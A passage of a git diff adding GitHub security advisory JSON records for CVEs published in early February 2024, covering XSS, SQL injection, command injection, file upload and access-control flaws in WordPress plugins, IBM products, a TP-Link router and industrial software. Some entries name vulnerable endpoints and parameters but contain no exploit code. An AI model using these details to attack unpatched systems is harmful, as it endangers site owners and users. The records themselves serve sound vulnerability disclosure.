+ { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254776" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q45w-f72f-v464/GHSA-q45w-f72f-v464.json b/advisories/unreviewed/2024/02/GHSA-q45w-f72f-v464/GHSA-q45w-f72f-v464.json new file mode 100644 index 0000000000000..7fa8f6d792bc6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q45w-f72f-v464/GHSA-q45w-f72f-v464.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q45w-f72f-v464", + "modified": "2024-02-02T15:30:28Z", + "published": "2024-02-02T15:30:28Z", + "aliases": [ + "CVE-2023-6673" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in National Keep Cyber Security Services CyberMath allows Reflected XSS.This issue affects CyberMath: from v.1.4 before v.1.5.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6673" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-24-0080" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T13:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q524-mh68-7m66/GHSA-q524-mh68-7m66.json b/advisories/unreviewed/2024/02/GHSA-q524-mh68-7m66/GHSA-q524-mh68-7m66.json new file mode 100644 index 0000000000000..18051b99a96aa --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q524-mh68-7m66/GHSA-q524-mh68-7m66.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q524-mh68-7m66", + "modified": "2024-02-01T12:30:22Z", + "published": "2024-02-01T12:30:22Z", + "aliases": [ + "CVE-2023-51666" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PickPlugins Related Post allows Stored XSS.This issue affects Related Post: from n/a through 2.0.53.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51666" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/related-post/wordpress-related-post-plugin-2-0-53-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q54q-m468-q77v/GHSA-q54q-m468-q77v.json b/advisories/unreviewed/2024/02/GHSA-q54q-m468-q77v/GHSA-q54q-m468-q77v.json new file mode 100644 index 0000000000000..66cb10c5fbee5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q54q-m468-q77v/GHSA-q54q-m468-q77v.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q54q-m468-q77v", + "modified": "2024-02-06T00:30:25Z", + "published": "2024-02-06T00:30:25Z", + "aliases": [ + "CVE-2023-6635" + ], + "details": "The EditorsKit plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation on the 'import_styles' function in versions up to, and including, 1.40.3. This makes it possible for authenticated attackers with administrator-level capabilities or above, to upload arbitrary files on the affected site's server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6635" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/block-options/tags/1.40.3/includes/addons/styles-manager/rest-api/gutenberghub-styles-import-export-controller.php#L100" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3010794/block-options" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4528f9a1-7027-4aa9-b006-bea84aa19c84?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q5wf-j98c-fr46/GHSA-q5wf-j98c-fr46.json b/advisories/unreviewed/2024/02/GHSA-q5wf-j98c-fr46/GHSA-q5wf-j98c-fr46.json new file mode 100644 index 0000000000000..60a8abdb48faf --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q5wf-j98c-fr46/GHSA-q5wf-j98c-fr46.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q5wf-j98c-fr46", + "modified": "2024-02-07T18:30:27Z", + "published": "2024-02-07T18:30:27Z", + "aliases": [ + "CVE-2023-32330" + ], + "details": "IBM Security Verify Access 10.0.0.0 through 10.0.6.1 uses insecure calls that could allow an attacker on the network to take control of the server. IBM X-Force ID: 254977.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32330" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/254977" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7106586" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T17:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q658-fh2m-cgvf/GHSA-q658-fh2m-cgvf.json b/advisories/unreviewed/2024/02/GHSA-q658-fh2m-cgvf/GHSA-q658-fh2m-cgvf.json new file mode 100644 index 0000000000000..5fdd0ae605a94 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q658-fh2m-cgvf/GHSA-q658-fh2m-cgvf.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q658-fh2m-cgvf", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0366" + ], + "details": "The Starbox – the Author Box for Humans plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 3.4.7 via the action function due to missing validation on a user controlled key. This makes it possible for subscribers to view plugin preferences and potentially other user settings.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0366" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/starbox/trunk/core/UserSettings.php" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3028775/starbox/trunk?contextall=1&old=3000701&old_path=%2Fstarbox%2Ftrunk" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c47601b4-bf16-4f59-b5f3-584a8eac7c67?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q7wc-c2ff-q9xq/GHSA-q7wc-c2ff-q9xq.json b/advisories/unreviewed/2024/02/GHSA-q7wc-c2ff-q9xq/GHSA-q7wc-c2ff-q9xq.json new file mode 100644 index 0000000000000..60c21a5c60c71 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q7wc-c2ff-q9xq/GHSA-q7wc-c2ff-q9xq.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q7wc-c2ff-q9xq", + "modified": "2024-02-06T18:30:20Z", + "published": "2024-02-06T18:30:20Z", + "aliases": [ + "CVE-2023-46183" + ], + "details": "IBM PowerVM Hypervisor FW950.00 through FW950.90, FW1020.00 through FW1020.40, and FW1030.00 through FW1030.30 could allow a system administrator to obtain sensitive partition information. IBM X-Force ID: 269695.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46183" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/269695" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7114982" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T16:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q7xm-vq7m-w9hh/GHSA-q7xm-vq7m-w9hh.json b/advisories/unreviewed/2024/02/GHSA-q7xm-vq7m-w9hh/GHSA-q7xm-vq7m-w9hh.json new file mode 100644 index 0000000000000..bd85941602e11 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q7xm-vq7m-w9hh/GHSA-q7xm-vq7m-w9hh.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q7xm-vq7m-w9hh", + "modified": "2024-02-02T00:31:27Z", + "published": "2024-02-02T00:31:27Z", + "aliases": [ + "CVE-2023-49115" + ], + "details": "\n\n\n\n\n\n\nMachineSense devices use unauthenticated MQTT messaging to monitor devices and remote viewing of sensor data by users.\n\n\n\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-49115" + }, + { + "type": "WEB", + "url": "https://machinesense.com/pages/about-machinesense" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-025-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-q9h2-7m5w-75p4/GHSA-q9h2-7m5w-75p4.json b/advisories/unreviewed/2024/02/GHSA-q9h2-7m5w-75p4/GHSA-q9h2-7m5w-75p4.json new file mode 100644 index 0000000000000..854c361f1d04d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-q9h2-7m5w-75p4/GHSA-q9h2-7m5w-75p4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q9h2-7m5w-75p4", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2023-47564" + ], + "details": "An incorrect permission assignment for critical resource vulnerability has been reported to affect Qsync Central. If exploited, the vulnerability could allow authenticated users to read or modify the resource via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQsync Central 4.4.0.15 ( 2024/01/04 ) and later\nQsync Central 4.3.0.11 ( 2024/01/11 ) and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47564" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qc2v-frq4-w9pj/GHSA-qc2v-frq4-w9pj.json b/advisories/unreviewed/2024/02/GHSA-qc2v-frq4-w9pj/GHSA-qc2v-frq4-w9pj.json new file mode 100644 index 0000000000000..7a9088ebb8631 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qc2v-frq4-w9pj/GHSA-qc2v-frq4-w9pj.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qc2v-frq4-w9pj", + "modified": "2024-02-02T09:30:19Z", + "published": "2024-02-02T09:30:19Z", + "aliases": [ + "CVE-2020-24681" + ], + "details": "Incorrect Permission Assignment for Critical Resource vulnerability in B&R Industrial Automation Automation Studio allows Privilege Escalation.This issue affects Automation Studio: from 4.6.0 through 4.6.X, from 4.7.0 before 4.7.7 SP, from 4.8.0 before 4.8.6 SP, from 4.9.0 before 4.9.4 SP.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24681" + }, + { + "type": "WEB", + "url": "https://www.br-automation.com/fileadmin/2021-14-BR-AS-NET-PVI-Service-Issues-c3710fbf.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T07:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qcjv-87c8-h68q/GHSA-qcjv-87c8-h68q.json b/advisories/unreviewed/2024/02/GHSA-qcjv-87c8-h68q/GHSA-qcjv-87c8-h68q.json new file mode 100644 index 0000000000000..e46329b95c28d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qcjv-87c8-h68q/GHSA-qcjv-87c8-h68q.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qcjv-87c8-h68q", + "modified": "2024-02-02T12:30:30Z", + "published": "2024-02-02T12:30:30Z", + "aliases": [ + "CVE-2024-23895" + ], + "details": "A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/locationcreate.php, in the locationid parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23895" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cups-easy" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T10:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qcm3-g6g8-5572/GHSA-qcm3-g6g8-5572.json b/advisories/unreviewed/2024/02/GHSA-qcm3-g6g8-5572/GHSA-qcm3-g6g8-5572.json new file mode 100644 index 0000000000000..8c507f37a0eff --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qcm3-g6g8-5572/GHSA-qcm3-g6g8-5572.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qcm3-g6g8-5572", + "modified": "2024-02-03T00:31:34Z", + "published": "2024-02-03T00:31:34Z", + "aliases": [ + "CVE-2024-1196" + ], + "details": "A vulnerability classified as problematic was found in SourceCodester Testimonial Page Manager 1.0. This vulnerability affects unknown code of the file add-testimonial.php of the component HTTP POST Request Handler. The manipulation of the argument name/description/testimony leads to cross site scripting. The attack can be initiated remotely. VDB-252694 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1196" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252694" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252694" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T22:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qfhm-jrhg-gr45/GHSA-qfhm-jrhg-gr45.json b/advisories/unreviewed/2024/02/GHSA-qfhm-jrhg-gr45/GHSA-qfhm-jrhg-gr45.json new file mode 100644 index 0000000000000..2a1118bba43d6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qfhm-jrhg-gr45/GHSA-qfhm-jrhg-gr45.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qfhm-jrhg-gr45", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2024-22108" + ], + "details": "An issue was discovered in GTB Central Console 15.17.1-30814.NG. The method setTermsHashAction at /opt/webapp/lib/PureApi/CCApi.class.php is vulnerable to an unauthenticated SQL injection via /ccapi.php that an attacker can abuse in order to change the Administrator password to a known value.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22108" + }, + { + "type": "WEB", + "url": "https://adepts.of0x.cc/gtbcc-pwned/" + }, + { + "type": "WEB", + "url": "https://x-c3ll.github.io/cves.html" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qfm6-2jf8-7v9r/GHSA-qfm6-2jf8-7v9r.json b/advisories/unreviewed/2024/02/GHSA-qfm6-2jf8-7v9r/GHSA-qfm6-2jf8-7v9r.json new file mode 100644 index 0000000000000..8e7c9c4298aff --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qfm6-2jf8-7v9r/GHSA-qfm6-2jf8-7v9r.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qfm6-2jf8-7v9r", + "modified": "2024-02-07T12:30:26Z", + "published": "2024-02-07T12:30:26Z", + "aliases": [ + "CVE-2024-1109" + ], + "details": "The Podlove Podcast Publisher plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the init_download() and init() functions in all versions up to, and including, 4.0.11. This makes it possible for unauthenticated attackers to export the plugin's tracking data and podcast information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1109" + }, + { + "type": "WEB", + "url": "https://github.com/podlove/podlove-publisher/commit/0ac83d1955aa964a358833b1b5ce790fff45b3f4" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3032008%40podlove-podcasting-plugin-for-wordpress&new=3032008%40podlove-podcasting-plugin-for-wordpress&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a7b25b66-e9d1-448d-8367-cce4c0dec635?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T11:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qgx2-jx39-h26j/GHSA-qgx2-jx39-h26j.json b/advisories/unreviewed/2024/02/GHSA-qgx2-jx39-h26j/GHSA-qgx2-jx39-h26j.json new file mode 100644 index 0000000000000..8d15cabc9dcb0 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qgx2-jx39-h26j/GHSA-qgx2-jx39-h26j.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qgx2-jx39-h26j", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0835" + ], + "details": "The Royal Elementor Kit theme for WordPress is vulnerable to unauthorized arbitrary transient update due to a missing capability check on the dismissed_handler function in all versions up to, and including, 1.0.116. This makes it possible for authenticated attackers, with subscriber access or higher, to update arbitrary transients. Note, that these transients can only be updated to true and not arbitrary values.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0835" + }, + { + "type": "WEB", + "url": "https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=216524%40royal-elementor-kit&new=216524%40royal-elementor-kit&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://wordpress.org/themes/royal-elementor-kit/" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/603b6c52-48eb-4e8c-a2c1-77b12a2b1a2c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qh6x-9qph-mmv5/GHSA-qh6x-9qph-mmv5.json b/advisories/unreviewed/2024/02/GHSA-qh6x-9qph-mmv5/GHSA-qh6x-9qph-mmv5.json new file mode 100644 index 0000000000000..f9987cf7f699d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qh6x-9qph-mmv5/GHSA-qh6x-9qph-mmv5.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qh6x-9qph-mmv5", + "modified": "2024-02-02T18:30:30Z", + "published": "2024-02-02T00:31:27Z", + "aliases": [ + "CVE-2024-22927" + ], + "details": "Cross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via crafted URL.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22927" + }, + { + "type": "WEB", + "url": "https://github.com/weng-xianhu/eyoucms/issues/57" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qmjp-x43g-wwmh/GHSA-qmjp-x43g-wwmh.json b/advisories/unreviewed/2024/02/GHSA-qmjp-x43g-wwmh/GHSA-qmjp-x43g-wwmh.json new file mode 100644 index 0000000000000..a7260adc16e7f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qmjp-x43g-wwmh/GHSA-qmjp-x43g-wwmh.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qmjp-x43g-wwmh", + "modified": "2024-02-03T03:30:27Z", + "published": "2024-02-01T15:30:24Z", + "aliases": [ + "CVE-2024-24060" + ], + "details": "springboot-manager v1.6 is vulnerable to Cross Site Scripting (XSS) via /sys/user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24060" + }, + { + "type": "WEB", + "url": "https://github.com/By-Yexing/Vulnerability_JAVA/blob/main/2024/springboot-manager.md#11-stored-cross-site-scripting-sysuser" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T14:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qp5h-6h76-j5w8/GHSA-qp5h-6h76-j5w8.json b/advisories/unreviewed/2024/02/GHSA-qp5h-6h76-j5w8/GHSA-qp5h-6h76-j5w8.json new file mode 100644 index 0000000000000..9ffe90e7de202 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qp5h-6h76-j5w8/GHSA-qp5h-6h76-j5w8.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qp5h-6h76-j5w8", + "modified": "2024-02-02T09:30:19Z", + "published": "2024-02-02T09:30:19Z", + "aliases": [ + "CVE-2021-22282" + ], + "details": "Improper Control of Generation of Code ('Code Injection') vulnerability in B&R Industrial Automation Automation Studio allows Local Execution of Code.This issue affects Automation Studio: from 4.0 through 4.12.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22282" + }, + { + "type": "WEB", + "url": "https://www.br-automation.com/fileadmin/2021-12_RCE_Vulnerability_in_BnR_Automation_Studio-1b993aeb.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qphc-8455-gj55/GHSA-qphc-8455-gj55.json b/advisories/unreviewed/2024/02/GHSA-qphc-8455-gj55/GHSA-qphc-8455-gj55.json new file mode 100644 index 0000000000000..9f0b4a842f79f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qphc-8455-gj55/GHSA-qphc-8455-gj55.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qphc-8455-gj55", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2023-47209" + ], + "details": "A post authentication command injection vulnerability exists in the ipsec policy functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47209" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1854" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T17:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-qrmv-p28h-q98v/GHSA-qrmv-p28h-q98v.json b/advisories/unreviewed/2024/02/GHSA-qrmv-p28h-q98v/GHSA-qrmv-p28h-q98v.json new file mode 100644 index 0000000000000..e860048aca7aa --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-qrmv-p28h-q98v/GHSA-qrmv-p28h-q98v.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qrmv-p28h-q98v", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0961" + ], + "details": "The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the code editor in all versions up to, and including, 1.58.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0961" + }, + { + "type": "WEB", + "url": 